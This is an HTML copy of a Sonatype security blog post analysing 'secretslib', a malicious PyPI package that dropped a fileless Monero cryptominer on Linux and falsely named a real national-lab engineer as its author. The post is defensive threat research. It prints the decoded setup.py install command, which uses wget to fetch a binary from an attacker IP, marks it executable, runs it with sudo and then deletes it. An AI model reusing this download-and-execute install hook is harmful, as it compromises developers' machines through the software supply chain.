                                                          <span id="hs_cos_wrapper_my_social_sharing" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_social_sharing" style="" data-hs-cos-general-type="widget" data-hs-cos-type="social_sharing"><a href="http://www.facebook.com/share.php?u=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dfacebook" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=24&amp;name=facebook-circle-trim.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on Facebook" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=12&amp;name=facebook-circle-trim.png 12w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=24&amp;name=facebook-circle-trim.png 24w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=36&amp;name=facebook-circle-trim.png 36w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=48&amp;name=facebook-circle-trim.png 48w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=60&amp;name=facebook-circle-trim.png 60w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=72&amp;name=facebook-circle-trim.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a>&nbsp;<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dlinkedin" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=24&amp;name=Linked-In-Circle-trim.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on LinkedIn" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=12&amp;name=Linked-In-Circle-trim.png 12w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=24&amp;name=Linked-In-Circle-trim.png 24w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=36&amp;name=Linked-In-Circle-trim.png 36w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=48&amp;name=Linked-In-Circle-trim.png 48w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=60&amp;name=Linked-In-Circle-trim.png 60w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=72&amp;name=Linked-In-Circle-trim.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a>&nbsp;<a href="https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dtwitter&amp;url=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dtwitter&amp;source=tweetbutton&amp;text=PyPI%20Package%20%27secretslib%27%20Drops%20Fileless%20Linux%20Malware%20to%20Mine%20Monero" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=24&amp;name=Twitter-circle-trim.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on Twitter" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=12&amp;name=Twitter-circle-trim.png 12w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=24&amp;name=Twitter-circle-trim.png 24w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=36&amp;name=Twitter-circle-trim.png 36w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=48&amp;name=Twitter-circle-trim.png 48w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=60&amp;name=Twitter-circle-trim.png 60w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=72&amp;name=Twitter-circle-trim.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a>&nbsp;<a href="mailto:?subject=Check%20out%20https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Demail%20&amp;body=Check%20out%20https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Demail" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=24&amp;name=mail-circle.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on Email" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=12&amp;name=mail-circle.png 12w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=24&amp;name=mail-circle.png 24w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=36&amp;name=mail-circle.png 36w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=48&amp;name=mail-circle.png 48w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=60&amp;name=mail-circle.png 60w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=72&amp;name=mail-circle.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a></span>
                                                      </div>   
                                                  </div>                                                                                                  
                                                </div>
                                              </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="row-fluid">
                                    <div class="span12">
                                        
                                            <a href="https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero" title="" class="hs-featured-image-link">
                                                <img src="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-open-source-components-dependencies-100.jpg" class="hs-featured-image" alt="">
                                            </a>
                                        
                                    </div>
                                </div>

                                <div class="section post-body">
                                    <span id="hs_cos_wrapper_post_body" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="rich_text"><h4><span>The curious case of 'secretslib'—a fileless cryptominer</span></h4>
<p>Sonatype has identified a 'secretslib' PyPI package that describes itself as "secrets matching and verification made easy." On a closer inspection though, the package covertly runs cryptominers on your Linux machine in-memory (directly from your RAM), a technique largely employed by fileless malware and <a href="https://encyclopedia.kaspersky.com/glossary/cryptor/" rel="noopener" target="_blank">crypters</a>.</p>
<p>Further, the threat actor publishing the malicious package used the identity and contact information of a real national laboratory software engineer working for a U.S. Department of Energy-funded lab to lend credibility to their malware but the truth eventually surfaced.</p>
<!--more-->
<h2>Linux Malware Has 'Zero detection' Rate</h2>
<p>Last week, Sonatype's automated malware detection systems, offered as a part of <a href="https://www.sonatype.com/products/firewall" rel="noopener" target="_blank">Nexus Firewall</a>, flagged the '<a href="https://archive.is/wip/SqnA4" rel="noopener" target="_blank">secretslib</a>' PyPI package as potentially malicious.</p>
<p>The package, at the time of its release, claimed to be a library that helps with matching and verification of secrets—whatever that means.</p>
<p><img src="https://blog.sonatype.com/hubfs/image-png-Aug-10-2022-06-20-00-60-AM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block;"></p>
<p>Inside 'secretslib' 0.1.0, the only version of the package published to PyPI, we didn't notice any code that would aid a developer with "matching" or verifying any secrets whatsoever.</p>
<p>The main 'setup.py' script inside the package contains straightforward base64-encoded instructions:</p>
<p><img src="https://blog.sonatype.com/hubfs/image-png-Aug-10-2022-04-31-12-41-PM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block;"></p>
<p>These instructions, when decoded to plaintext, are essentially this*:</p>
<p><em><span style="font-family: 'Courier New', Courier, monospace;">sudo apt -y install wget cpulimit &gt; /dev/null 2&gt;&amp;1 &amp;&amp; wget -q <span style="font-weight: bold;">http://5.161.57[.]250/tox</span> &amp;&amp; chmod +x ./tox &amp;&amp; timeout -k 5s 1h</span></em></p>
<p><em><span style="font-family: 'Courier New', Courier, monospace;">sudo ./tox</span><br><span style="font-family: 'Courier New', Courier, monospace;">rm ./tox</span></em></p>
<p><em>*Malicious URL modified to include [.]</em></p>
<p>As soon as 'secretslib' is installed, it downloads a mysterious file called 'tox' from IP address 5.161.57.250, grants it <span style="font-style: italic;">execute</span> permissions, runs 'tox' with elevated permissions ("<a href="https://en.wikipedia.org/wiki/Sudo" rel="noopener" target="_blank">sudo</a>"), and deletes the file after it's running.</p>
<p>'tox' is a Linux executable (an ELF binary) file that is <a href="https://tr0id.medium.com/working-with-stripped-binaries-in-gdb-cacacd7d5a33#:~:text=A%20stripped%20binary%20is%20a,to%20debug%20and%20reverse%20engineer." rel="noopener" target="_blank">stripped</a>. Stripping an executable removes debugging information contained within it that would otherwise help a reverse engineer better understand what the program does.</p>
<p>Application developers may sometimes strip executables for legitimate reasons, such as reducing the size of a production release before distribution. But malicious actors can just as well find value from the functionality as stripping binaries could deter analysts and automated sandboxes from studying their malware as vital debugging information is removed.</p>
<p>For example, the stipped<a href="https://www.virustotal.com/gui/file/180dfc140f249f8a65054c3fed50626f56db30ab499c774fc2a8dc0b1125d6d3/detection" rel="noopener" target="_blank"> 'tox' binary has a clean reputation on VirusTotal</a> [<a href="https://archive.ph/90GRW" rel="noopener" target="_blank">archived</a>], as it achieves 'zero detection' across virtually every antivirus engine:</p>
<p><img src="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=770&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block; width: 770px;" width="770" srcset="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=385&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png 385w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=770&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png 770w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=1155&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png 1155w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=1540&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png 1540w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=1925&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png 1925w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-07-01-16-AM.png?width=2310&amp;name=image-png-Aug-10-2022-06-07-01-16-AM.png 2310w" sizes="(max-width: 770px) 100vw, 770px"></p>
<p>What an analyst might miss though is that the seemingly-innocuous 'tox' covertly drops another ELF file directly in memory—a sign commonly associated with "fileless malware."</p>
<p><img src="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=660&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block; width: 660px;" width="660" srcset="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=330&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png 330w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=660&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png 660w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=990&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png 990w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=1320&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png 1320w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=1650&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png 1650w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-06-08-30-52-AM.png?width=1980&amp;name=image-png-Aug-10-2022-06-08-30-52-AM.png 1980w" sizes="(max-width: 660px) 100vw, 660px"></p>
<p><img src="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=664&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png" loading="lazy" style="width: 664px; margin-left: auto; margin-right: auto; display: block;" width="664" srcset="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=332&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png 332w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=664&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png 664w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=996&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png 996w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=1328&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png 1328w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=1660&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png 1660w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-05-56-19-71-PM.png?width=1992&amp;name=image-png-Aug-10-2022-05-56-19-71-PM.png 1992w" sizes="(max-width: 664px) 100vw, 664px"></p>
<p>The name of the dropped file ('memfd' or 'memfd (deleted)' ) stated on VirusTotal in multiple places is an indicator that is created via the '<a href="https://man7.org/linux/man-pages/man2/memfd_create.2.html" rel="noopener" target="_blank">memfd_create</a>' system call.</p>
<p>Linux syscalls like 'memfd_create' enable programmers to drop "anonymous" files in RAM as opposed to writing the files to disk. Because the intermediate step of outputting the malicious file to the hard drive is skipped, it may not be as easy for antivirus products to proactively catch fileless malware, that now resides in a system's volatile memory, although the task is certainly not impossible.</p>
<h4>Sidenote</h4>
<p>Craig Rowland of Sandfly Security has done a great job of explaining the role of memfd_create and <a href="https://www.linkedin.com/pulse/detecting-linux-memfdcreate-fileless-malware-command-line-rowland/" rel="noopener" target="_blank" style="font-style: normal;">why would it be invaluable to threat actors creating fileless malware</a> that "doesn't wish to be seen." In March 2019, systems engineer, Guilherme Thomazi Bonicontro (aka <a href="https://twitter.com/guitmz" rel="noopener" target="_blank"><span style="font-style: italic;">guitmz</span></a>) wrote an ELF loader called "Ezuri" and explained <a href="https://www.guitmz.com/linux-elf-runtime-crypter/" rel="noopener" target="_blank" style="font-style: normal;">how it could be used to drop fileless ELF malware</a> using the 'memfd_create' syscall. In 2021, a report from AT&amp;T Alien Labs <a href="https://www.bleepingcomputer.com/news/security/linux-malware-authors-use-ezuri-golang-crypter-for-zero-detection/" rel="noopener" target="_blank" style="font-style: normal;">discussed threat actors using Ezuri crypter</a> in active attacks, to pack their malware and achieve a "zero detection" rate.</p>
<h2>ELF Drops Fileless Malware To Mine Monero (XMR)</h2>
<p>The malicious code dropped by 'tox' (referred to as 'memfd' by VirusTotal) is a Monero cryptominer. And, now the use of the "<a href="https://manpages.ubuntu.com/manpages/trusty/man1/cpulimit.1.html" rel="noopener" target="_blank">cpulimit</a>" command in the base64-encoded instructions above becomes a tad clearer—so the cryptominer dropped by 'tox' doesn't consume excessive system resources that would raise eyebrows.</p>
<p><a href="https://www.virustotal.com/gui/file/7e5f17388903178e15017e6ca0c0c860fa498df6f7e005217e86b9e42301964e" rel="noopener" target="_blank">Less than 40% of antivirus engines are able to detect this fileless malware</a> at the time of writing, and even then the detection wouldn't occur until after 'tox' has already executed and injected the malicious process in memory.</p>
<p><img src="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=770&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block; width: 770px;" width="770" srcset="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=385&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png 385w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=770&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png 770w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=1155&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png 1155w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=1540&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png 1540w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=1925&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png 1925w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-02-32-03-92-PM.png?width=2310&amp;name=image-png-Aug-10-2022-02-32-03-92-PM.png 2310w" sizes="(max-width: 770px) 100vw, 770px"></p>
<p>Moreover, since 'secretslib' package deletes 'tox' as soon as it runs, and the cryptomining code injected by 'tox' resides within the system's volatile memory (RAM) as opposed to the hard drive, the malicious activity leaves little to no footprint and is quite "invisible" in a forensic sense.</p>
<h2>A Curious Identity: Stolen From A Real Engineer</h2>
<p>What makes matters even more interesting is the fact that the 'Author' metadata contained within 'secretslib' as well as on the package's PyPI page lists the name and information of a real software engineer.</p>
<p>The named engineer works for Argonne National Laboratory (<a href="https://www.anl.gov/" rel="noopener" target="_blank"><span style="font-weight: bold;">ANL.gov</span></a>), an Illinois-based science and engineering research lab operated by UChicago Argonne LLC for the U.S. Department of Energy. But, turns out they are not the ones who published this package.</p>
<p><img src="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=341&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block; width: 341px;" width="341" srcset="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=171&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png 171w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=341&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png 341w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=512&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png 512w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=682&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png 682w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=853&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png 853w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-30-03-98-PM.png?width=1023&amp;name=image-png-Aug-10-2022-04-30-03-98-PM.png 1023w" sizes="(max-width: 341px) 100vw, 341px"></p>
<p>The author's <em>@anl.gov</em> email address listed under the contact information piqued my curiosity and I noticed many legitimate employees and associates of ANL, at some point in the past, had been contributors to the PyPI registry:</p>
<p><img src="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=755&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png" loading="lazy" style="margin-left: auto; margin-right: auto; display: block; width: 755px;" width="755" srcset="https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=378&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png 378w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=755&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png 755w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=1133&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png 1133w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=1510&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png 1510w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=1888&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png 1888w, https://blog.sonatype.com/hs-fs/hubfs/image-png-Aug-10-2022-04-35-29-58-PM.png?width=2265&amp;name=image-png-Aug-10-2022-04-35-29-58-PM.png 2265w" sizes="(max-width: 755px) 100vw, 755px"></p>
<p>And, perhaps this would have prompted the threat actor to use the identity of a real employee; to mislead users and blend 'secretslib' among one of the legitimate and safe packages formerly published by ANL researchers.</p>
<p>We reached out to the named engineer and were told that they did not publish 'secretslib.' The engineer further reported the package to the PyPI registry and the package has been taken down. According to PePy.tech stats, 'secretslib' reached<a href="https://pepy.tech/project/secretslib" rel="noopener" target="_blank"> less than 100 downloads</a> (this figure includes retrievals from humans and automated mirrors) before it was pulled from PyPI. The package has been assigned sonatype-2022-4464 in our security research data.</p>
<p>This isn't the first time that Sonatype has caught cryptominers in an open source registry. We have previously identified and analyzed <a href="/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices" rel="noopener" target="_blank">npm packages dropping cryptominers</a> on macOS, Linux, and Windows systems, and, even <a href="/sonatype-catches-new-pypi-cryptomining-malware-via-automated-detection" rel="noopener" target="_blank">malicious PyPI packages</a> achieving much the same outcome. But, the use of a quasi-clean stripped binary to drop aa Linux cryptominer in memory, and the miuse of a national lab employee's identity in the process is what makes this case particularly fascinating to an analyst, and worrisome to a developer.</p>
<h2>Nexus Firewall Keeps You Protected</h2>
<p>As a DevSecOps organization, we remain committed to identifying and stopping evolving attacks like the ones discussed above, against open source developers and the wider software supply chain.</p>
<p>As threat actors get smarter,<span>&nbsp;</span><a href="https://www.sonatype.com/products/firewall"><span>Nexus Firewall</span></a><span> users </span>can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.&nbsp;</p>
<p><strong><img src="https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=624&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png" alt="U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=312&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png 312w, https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=624&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png 624w, https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=936&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png 936w, https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=1248&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png 1248w, https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=1560&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png 1560w, https://blog.sonatype.com/hs-fs/hubfs/Imported%20sitepage%20images/U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png?width=1872&amp;name=U-cofx0-oAHuk7B8hQ_0YBbx7E9LQSW04uag5iP4Q7mdyUWkjohGvAiYYykP8LnvXzbz7CUADYOIt3X4KVAozG7Sxz7PFEffVVl_TP2LufuKfXcPzVvjvk3Br_IPtFK9776-HbUE.png 1872w" sizes="(max-width: 624px) 100vw, 624px" width="624" style="margin-left: auto; margin-right: auto; display: block;"></strong></p>
<p><span>Nexus Firewall</span><span>&nbsp;</span>instances will automatically quarantine any suspicious components detected by our automated malware detection systems while a manual review by a researcher is in the works, thereby keeping your software supply chain protected from the start.&nbsp;</p>
<p>Sonatype’s world-class security research data, combined with our<span>&nbsp;</span><a href="https://www.sonatype.com/press-release-blog/next-generation-nexus-intelligence"><span>automated malware detection</span></a><span>&nbsp;</span>technology safeguards your developers, customers, and software supply chain from infections.</p></span>
                                </div>
                                
                                     <p id="hubspot-topic_data"> Tags:
                                        
                                            <a class="topic-link" href="https://blog.sonatype.com/topic/vulnerabilities">vulnerabilities</a>,
                                        
                                            <a class="topic-link" href="https://blog.sonatype.com/topic/nexus-firewall">Nexus Firewall</a>,
                                        
                                            <a class="topic-link" href="https://blog.sonatype.com/topic/malware-prevention">malware prevention</a>,
                                        
                                            <a class="topic-link" href="https://blog.sonatype.com/topic/devzone">DevZone</a>
                                        
                                     </p>
                                
                            </div>
                        </div>
                    </div>
                </div>
                <!-- Optional: Blog Author Bio Box -->
                <div class="about-author-sec row-fluid">
                    <div class="span3 banner-flex-text">
                      
                        <img class="about-author-image" alt="Ax Sharma" src="https://blog.sonatype.com/hubfs/akshay%20ax%20sharma.jpeg">
                      
                    </div>
                    <div class="span9 flex-form">
                        <h3>Written by <a class="author-link" href="https://blog.sonatype.com/author/akshay-ax-sharma">Ax Sharma</a></h3>
                        <p>Ax is a Security Researcher at Sonatype and Engineer who holds a passion for perpetual learning. His works and expert analyses have frequently been featured by leading media outlets. Ax's expertise lies in security vulnerability research, reverse engineering, and software development. In his spare time, he loves exploiting vulnerabilities ethically and educating a wide range of audiences.</p>
                        
                            <div class="hs-author-social-section">                                 
                                <div class="hs-author-social-links">
                                  Follow me on:
                                    
                                    
                                        <a href="https://www.linkedin.com/in/axsharma/" target="_blank" class="hs-author-social-link hs-social-linkedin"><i class="fa fa-linkedin"></i></a>
                                    
                                    
                                        <a href="https://twitter.com/Ax_Sharma" target="_blank" class="hs-author-social-link hs-social-twitter"><i class="fa fa-twitter"></i></a>
                                    
                                    
                                </div>
                            </div>
                        
                    </div>
                </div>
            </div>
        </div>
        <div class="span4 post-sidebar-2018">
            
                   
            
